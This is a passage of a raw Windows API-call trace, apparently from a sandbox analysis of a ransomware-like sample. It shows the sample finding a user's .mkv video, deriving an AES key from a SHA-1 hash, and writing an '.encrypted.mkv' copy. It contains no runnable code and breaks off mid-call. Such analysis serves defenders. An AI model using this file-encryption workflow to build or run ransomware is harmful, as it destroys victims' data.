CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.171] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.171] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.171] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.171] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.171] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.171] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.171] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x682dd840, ftCreationTime.dwHighDateTime=0x1d5c096, ftLastAccessTime.dwLowDateTime=0x242d1200, ftLastAccessTime.dwHighDateTime=0x1d5b75e, ftLastWriteTime.dwLowDateTime=0x242d1200, ftLastWriteTime.dwHighDateTime=0x1d5b75e, nFileSizeHigh=0x0, nFileSizeLow=0xe765, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="9c5dg.mkv", cAlternateFileName="")) returned 0x7c2240 [0042.171] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.171] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.171] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.171] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.171] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.172] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.172] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.172] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.172] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.172] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.172] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.172] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.172] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.172] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.172] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.172] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0042.172] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.172] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.173] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.173] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.173] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.173] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.173] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.173] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.173] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.173] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.174] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.174] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.174] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.174] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.174] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.174] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.174] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.174] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.174] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.175] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.175] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.175] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.175] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.175] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.175] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.175] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.175] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.175] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.175] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.175] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.175] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.175] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.175] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.175] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.176] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.176] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.176] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.176] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.176] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.176] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0042.176] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.176] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.176] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.176] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.176] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.176] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0042.176] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.176] CryptDestroyHash (hHash=0x7c2100) returned 1 [0042.176] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.176] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.176] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.176] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.177] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.177] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\9c5dg.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.177] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.177] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0042.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0042.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0042.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.177] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0042.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0042.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.177] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.177] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.177] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.177] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0042.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0042.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0042.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0042.178] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0042.178] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0042.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.179] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl")) returned 0x10 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.179] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0042.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0042.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.179] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0042.179] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\9c5dg.encrypted.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\9c5dg.encrypted.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0042.180] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0042.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0042.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0042.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0042.180] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0042.180] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, 